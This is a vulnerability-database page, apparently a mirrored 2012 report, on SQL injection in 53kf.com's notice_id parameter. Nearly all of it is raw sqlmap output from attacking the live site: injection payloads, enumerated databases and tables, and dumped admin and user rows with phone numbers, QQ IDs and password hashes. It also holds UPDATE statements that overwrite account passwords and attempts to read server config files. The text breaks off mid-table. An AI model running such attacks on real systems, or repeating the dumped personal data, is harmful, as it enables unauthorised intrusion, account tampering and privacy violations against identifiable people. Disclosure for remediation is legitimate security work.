Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:94376
HistoryOct 10, 2012 - 12:00 a.m.

53kf.com的SQL严重注入漏洞

2012-10-1000:00:00
Root
www.seebug.org
24
JSON

简要描述:

53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤,Mysql用户为Root,虽不能写文件,但是可以读文件,文件代码看光光~~由于找不到后台,暂时没拿到webshell,反正拿不拿shell估计都是20个Rank,所以懒得费劲了~

详细说明:

sqlmap identified the following injection points with a total of 57 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

available databases [18]:
[] 53kf_old
[] 53kfcs
[] en
[] en1
[] entalk
[] information_schema
[] ip
[] ip5
[] ip_bak
[] ip_new
[] mysql
[] passport
[] talk
[] test
[] ut
[] v5
[] v5110110
[] v5_old
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

Database: 53kfcs
[14 tables]
±-----------------+
| admin_oper |
| admin_oper_bill |
| cs_address |
| cs_adv |
| cs_category |
| cs_company |
| cs_company_bill |
| cs_fav |
| cs_index_product |
| cs_mail |
| cs_notice |
| cs_order |
| cs_product |
| cs_same_product |
±-----------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

Database: v5
[52 tables]
±--------------------+
| ad |
| ad_count |
| ad_show |
| ad_show_js |
| conf_ip1 |
| cps_commission_log |
| cps_user |
| cps_user_account |
| cps_user_logs |
| cps_withdrawing_log |
| daemonlog_recv |
| daemonlog_send |
| gggj_account |
| gggj_accountHistory |
| gggj_ad |
| gggj_ad_old |
| gggj_adstat |
| gggj_config |
| gggj_master_type |
| gggj_master_user |
| gggj_oper_log |
| gggj_require |
| gggj_solution |
| gggj_spread |
| gggj_stat |
| gggj_user |
| gggj_user_config |
| id_record |
| kf_tuo |
| kf_tuo_test |
| mailqueue |
| official_adstat |
| official_stat |
| out_links |
| out_links_message |
| pub_cps |
| sendemail_record |
| user_infor |
| user_infor_xx |
| v5_admin_group |
| v5_admin_oper |
| v5_agent_bill |
| v5_agent_oper |
| v5_cate |
| v5_company |
| v5_company_account |
| v5_company_bill |
| v5_company_config |
| v5_company_talk_log |
| v5_worker |
| web_ad_out_links |
| web_user_url |
±--------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select count(*) from v5.cps_user: ‘1367’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select count(*) from v5.gggj_user: ‘225’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select count(*) from v5.v5_admin_oper: ‘3’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

Database: ut
[85 tables]
±-------------------------+
| access |
| access_log |
| account_switch |
| agent_oper |
| agent_style_lock |
| announcement |
| autoreply |
| autoreply2 |
| block_user |
| chat_nation |
| chat_net |
| chat_place |
| chat_search |
| chat_worker |
| com_talk |
| com_talk_all_moved |
| com_talk_bak |
| com_talk_hnqyw |
| com_talk_online |
| company |
| company_config |
| company_config1 |
| company_style |
| company_talk |
| company_yiyuan |
| company_yiyuan2 |
| conf_ip1 |
| conf_ip1_old |
| conf_sync |
| config_id_remark |
| config_value_remark |
| cus_bill |
| cus_group |
| cus_link |
| cus_mail |
| cus_sms |
| cus_theme |
| cus_user |
| customer |
| customer2 |
| cyy |
| cyy_group |
| err_infos |
| face |
| file |
| imessage |
| jiulong_log |
| link |
| logsql |
| mail |
| mail_template |
| mailqueue |
| message |
| message2 |
| module |
| module2 |
| robot |
| robot_mem |
| room_message |
| sms_config |
| sms_lword |
| sql_sync |
| stat |
| stat_from |
| stat_nation |
| stat_place |
| stat_search |
| stat_to |
| sys_notify |
| talk_evalu |
| talk_his |
| talk_his_delete |
| talk_his_read |
| talk_id |
| talk_subject |
| talk_total |
| talk_vote |
| user |
| user2 |
| worker |
| worker_config |
| worker_group |
| worker_online_log |
| worker_online_log_detail |
| worker_talk |
±-------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select * from v5.v5_admin_oper [3]:
[] [email protected], 605, 761, 0, , louwb, 1115adb0c8644ead44e6192dafb54f96b9d3bfdf, 13588816882, 18981795, ,
[] [email protected], 605, 762, 0, , wangys, 30c24dcd9266d646c92bb164d63cbb8b457ce6f8, 13858193074, 88579737, ,
[*] [email protected], 605, 763, 0, , xuxt, e01bc777acca079d1c41b47660583bc346bc526e, 111, 111, ,
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

Database: talk
[80 tables]
±-------------------------+
| access |
| access_log |
| account_switch |
| agent_oper |
| agent_style_lock |
| announcement |
| area_kf |
| autoreply |
| block_user |
| chat_nation |
| chat_net |
| chat_place |
| chat_search |
| chat_worker |
| company |
| company_ad |
| company_config |
| company_etel |
| company_style |
| conf_ip1 |
| conf_ip1_old |
| conf_sync |
| config_id_remark |
| config_value_remark |
| cus_bill |
| cus_group |
| cus_link |
| cus_mail |
| cus_sms |
| cus_theme |
| cus_user |
| customer |
| cyy |
| cyy_group |
| err_infos |
| etel_logo |
| face |
| file |
| identity |
| imessage |
| jiulong_log |
| link |
| logo |
| logsql |
| mail_template |
| mailqueue |
| message |
| module |
| module_special |
| robot |
| robot_mem |
| room_message |
| sms_config |
| sms_lword |
| sql_sync |
| stat |
| stat_from |
| stat_keyword_month |
| stat_nation |
| stat_place |
| stat_search |
| stat_to |
| sys_notify |
| talk_evalu |
| talk_his |
| talk_his_delete |
| talk_his_read |
| talk_id |
| talk_subject |
| talk_total |
| talk_vote |
| v5_company_config |
| worker |
| worker_config |
| worker_group |
| worker_online_log |
| worker_online_log_detail |
| zsk_category |
| zsk_key |
| zsk_question |
±-------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

current database: ‘v5’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select * from v5.cps_user where username=‘clzzy444’: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

Database: v5
Table: cps_user
[13 columns]
±------------------±-------------+
| Column | Type |
±------------------±-------------+
| balance | float(10,2) |
| cash_frozen_money | float(10,2) |
| company_url | varchar(50) |
| contact_name | varchar(50) |
| cust_id | varchar(20) |
| id | int(20) |
| is_checked | tinyint(2) |
| is_verified | tinyint(2) |
| mobile | varchar(11) |
| pwd | varchar(50) |
| qq | varchar(11) |
| reg_num | int(10) |
| user_name | varchar(100) |
±------------------±-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select * from v5.cps_user where user_name=‘clzzy444’: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select * from v5.cps_user where id=‘clzzy444’: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select * from v5.cps_user where qq=‘235623654’ [1]:
[*] 0.00, 0.00, http://www.ggggww.com, ???, clzzy444, 28024, 1, 1, 15829002900, my81trWOM1JpY, 235623654, 0, [email protected]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select count(*) from v5.cps_user where balance>100: ‘7’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select count(*) from v5.cps_user where balance>1000: ‘0’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select count(*) from v5.cps_user where balance>500: ‘2’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select count(*) from v5.cps_user where cash_frozen_money>500: ‘0’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select count(*) from v5.cps_user where cash_frozen_money>100: ‘0’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select count(*) from v5.cps_user where cash_frozen_money>600: ‘0’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select count(*) from v5.cps_user where cash_frozen_money>550: ‘0’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select count(*) from v5.cps_user where balance>550: ‘2’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select count(*) from v5.cps_user where balance>650: ‘1’
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select * from v5.cps_user where balance>550 [2]:
[] 600.00, 0.00, http://www.53kf.com, ???, 53kflify, 27811, 1, 0, 15727949427, mynK8lOObPeyY, 635731110, 63, [email protected]
[] 700.00, 0.00, http://www.53kf.com, ???, 53kfxupan, 27812, 1, 1, 13750928493, my8OmAlyld.yw, 2324347056, 38, [email protected]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

update v5.cps_user set pwd='my81trWOM1JpY ’ where user_name=‘[email protected]’: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

update v5.cps_user set pwd=‘my81trWOM1JpY’ where user_name=‘[email protected]’: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

update v5.cps_user set pwd=‘my81trWOM1JpY’ where user_name=‘[email protected]’: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select * where user_name=‘[email protected]’: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

select pwd from v5.cps_user where user_name=‘[email protected]’ [1]:
[*] mynK8lOObPeyY
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

database management system users privileges:
[] %% (administrator) [26]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: UPDATE
privilege: USAGE
[] %root% (administrator) [25]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: UPDATE
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

/apache/logs/error.log file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

/etc/httpd/logs/acces_log file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

/etc/httpd/conf/httpd.conf file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

/usr/local/apache/conf/httpd.conf file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

/var/www/html/apache/conf/httpd.conf file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

/var/www/html/apache/conf/httpd.conf file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

/home/httpd/conf/httpd.conf file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

Database: v5
Table: cps_withdrawing_log
[14 columns]
±-----------------------±-----------------+
| Column | Type |
±-----------------------±-----------------+
| account_user | varchar(20) |
| audit_oper | varchar(20) |
| audit_remark | text |
| audit_time | datetime |
| cust_id | varchar(20) |
| id | int(20) |
| io_remark | text |
| money | float(10,2) |
| status | varchar(30) |
| withdrawing_account | varchar(50) |
| withdrawing_audit_oper | varchar(20) |
| withdrawing_remark | text |
| withdrawing_time | datetime |
| withdrawing_type | int(10) unsigned |
±-----------------------±-----------------+
Database: v5
Table: ad
[19 columns]
±-----------±-------------+
| Column | Type |
±-----------±-------------+
| ad_area | varchar(150) |
| ad_content | varchar(255) |
| ad_flag | tinyint(1) |
| ad_type | varchar(2) |
| ad_url | varchar(100) |
| company_id | bigint(20) |
| exp_day | date |
| id | int(11) |
| lang | varchar(5) |
| money | float(10,2) |
| oem | varchar(20) |
| proxy | varchar(20) |
| remark | mediumtext |
| seller | varchar(20) |
| start_day | date |
| sys_flag | tinyint(1) |
| t_day | datetime |
| t_edit_day | date |
| vip_order | int(10) |
±-----------±-------------+
Database: v5
Table: pub_cps
[6 columns]
±---------±------------+
| Column | Type |
±---------±------------+
| content | text |
| id | int(20) |
| pub_date | datetime |
| pub_type | varchar(20) |
| title | text |
| url | varchar(50) |
±---------±------------+
Database: v5
Table: v5_company_account
[10 columns]
±-------------±-----------------+
| Column | Type |
±-------------±-----------------+
| active_money | float(7,2) |
| company_id | int(20) unsigned |
| fee_date | date |
| fee_money | int(10) |
| fee_total | int(10) |
| fix_money | float(7,2) |
| fz_money | float(7,2) |
| id | int(20) unsigned |
| money | float(7,2) |
| pre_total | int(20) |
±-------------±-----------------+
Database: v5
Table: kf_tuo_test
[10 columns]
±----------±-------------+
| Column | Type |
±----------±-------------+
| ad_id | int(10) |
| ad_type | varchar(10) |
| area | varchar(100) |
| arg | varchar(30) |
| come_date | datetime |
| come_ip | varchar(20) |
| come_url | varchar(250) |
| host | varchar(30) |
| id | int(10) |
| user_id | int(10) |
±----------±-------------+
Database: v5
Table: v5_admin_group
[3 columns]
±-----------±------------+
| Column | Type |
±-----------±------------+
| id | int(11) |
| name | varchar(50) |
| permission | text |
±-----------±------------+
Database: v5
Table: gggj_spread
[8 columns]
±------------±--------------+
| Column | Type |
±------------±--------------+
| add_time | date |
| admin_audit | enum(‘Y’,‘N’) |
| end_time | date |
| id | int(10) |
| log | text |
| money | varchar(10) |
| wzz_audit | enum(‘Y’,‘N’) |
| wzz_name | varchar(10) |
±------------±--------------+
Database: v5
Table: gggj_stat
[10 columns]
±------------±------------------+
| Column | Type |
±------------±------------------+
| ad_date | date |
| ad_from | tinyint(2) |
| ad_id | int(11) |
| ad_price | float |
| Clearing | enum(‘Y’,‘N’,‘X’) |
| click | int(11) |
| disp | int(11) |
| domain_name | varchar(20) |
| end_time | timestamp |
| money_type | tinyint(2) |
±------------±------------------+
Database: v5
Table: v5_admin_oper
[11 columns]
±----------±-----------------+
| Column | Type |
±----------±-----------------+
| email | varchar(50) |
| group_id | smallint(2) |
| id | int(10) unsigned |
| is_admin | tinyint(2) |
| name | varchar(128) |
| oper_name | varchar(20) |
| oper_pwd | varchar(50) |
| phone | varchar(15) |
| qq | varchar(12) |
| reg_date | datetime |
| type | varchar(100) |
±----------±-----------------+
Database: v5
Table: daemonlog_send
[3 columns]
±-------±---------+
| Column | Type |
±-------±---------+
| action | char(16) |
| sendid | char(20) |
| stat | text |
±-------±---------+
Database: v5
Table: daemonlog_recv
[3 columns]
±------------±---------+
| Column | Type |
±------------±---------+
| action | char(16) |
| last_recvid | char(20) |
| stat | text |
±------------±---------+
Database: v5
Table: v5_cate
[3 columns]
±-------±-----------------+
| Column | Type |
±-------±-----------------+
| id | int(20) unsigned |
| name | varchar(40) |
| pid | int(20) |
±-------±-----------------+
Database: v5
Table: out_links_message
[4 columns]
±----------±-------------+
| Column | Type |
±----------±-------------+
| id | int(10) |
| message | varchar(256) |
| time | datetime |
| user_name | varchar(25) |
±----------±-------------+
Database: v5
Table: gggj_solution
[5 columns]
±---------±------------+
| Column | Type |
±---------±------------+
| add_date | datetime |
| add_user | int(10) |
| content | text |
| id | int(10) |
| title | varchar(50) |
±---------±------------+
Database: v5
Table: official_stat
[9 columns]
±------------±------------------+
| Column | Type |
±------------±------------------+
| ad_date | date |
| ad_from | tinyint(2) |
| ad_id | int(11) |
| ad_price | float |
| Clearing | enum(‘Y’,‘N’,‘X’) |
| click | int(11) |
| disp | int(11) |
| domain_name | varchar(20) |
| money_type | tinyint(2) |
±------------±------------------+
Database: v5
Table: gggj_oper_log
[5 columns]
±----------±------------+
| Column | Type |
±----------±------------+
| id | int(11) |
| log | text |
| oper_time | datetime |
| type | varchar(10) |
| user_id | varchar(20) |
±----------±------------+
Database: v5
Table: cps_user_logs
[8 columns]
±---------------±-------------+
| Column | Type |
±---------------±-------------+
| after_content | varchar(255) |
| before_content | varchar(255) |
| classname | varchar(30) |
| createtime | datetime |
| logs_id | int(11) |
| oper_name | varchar(30) |
| operating | varchar(30) |
| sqlstr | text |
±---------------±-------------+
Database: v5
Table: gggj_user
[7 columns]
±------------±-------------+
| Column | Type |
±------------±-------------+
| accountCode | varchar(50) |
| add_time | date |
| domain_name | varchar(20) |
| gggj_type | varchar(10) |
| id | int(11) |
| industry | varchar(5) |
| remark | varchar(255) |
±------------±-------------+
Database: v5
Table: v5_company
[51 columns]
±--------------------±-----------------+
| Column | Type |
±--------------------±-----------------+
| add_time | datetime |
| address | varchar(255) |
| admin_flag | tinyint(1) |
| chat_num | int(10) |
| chat_num_last | int(10) |
| chat_num_last_total | int(10) |
| city | varchar(50) |
| comm_num | int(10) |
| company_id | int(10) unsigned |
| domain_name | varchar(20) |
| email | varchar(50) |
| fax | varchar(20) |
| free_click | int(10) |
| friend_links | int(10) |
| hot_num | int(10) |
| indus | varchar(50) |
| key_word | varchar(60) |
| kf_bind | tinyint(2) |
| kf_id | varchar(30) |
| kf_type | tinyint(3) |
| last_login | datetime |
| linkman | varchar(25) |
| logo | varchar(25) |
| method | tinyint(1) |
| method_nnet | tinyint(1) |
| name | varchar(255) |
| net_reg | tinyint(1) |
| notes | text |
| online | bigint(20) |
| order_flag | tinyint(1) |
| paim | float |
| phone | varchar(40) |
| province | varchar(50) |
| proxy | varchar(50) |
| qq | varchar(50) |
| real_proxy | varchar(50) |
| reg_from | varchar(4) |
| search | varchar(255) |
| sell_name | varchar(20) |
| sell_stat | tinyint(2) |
| short_name | varchar(255) |
| show_flag | tinyint(2) |
| t_date | float(10,2) |
| t_today | date |
| t_total | float(10,2) |
| talk_area | varchar(150) |
| talk_etime | tinyint(10) |
| talk_stime | tinyint(10) |
| talk_url | varchar(100) |
| url | varchar(50) |
| vip_order | int(11) |
±--------------------±-----------------+
Database: v5
Table: v5_agent_bill
[8 columns]
±---------±--------------------+
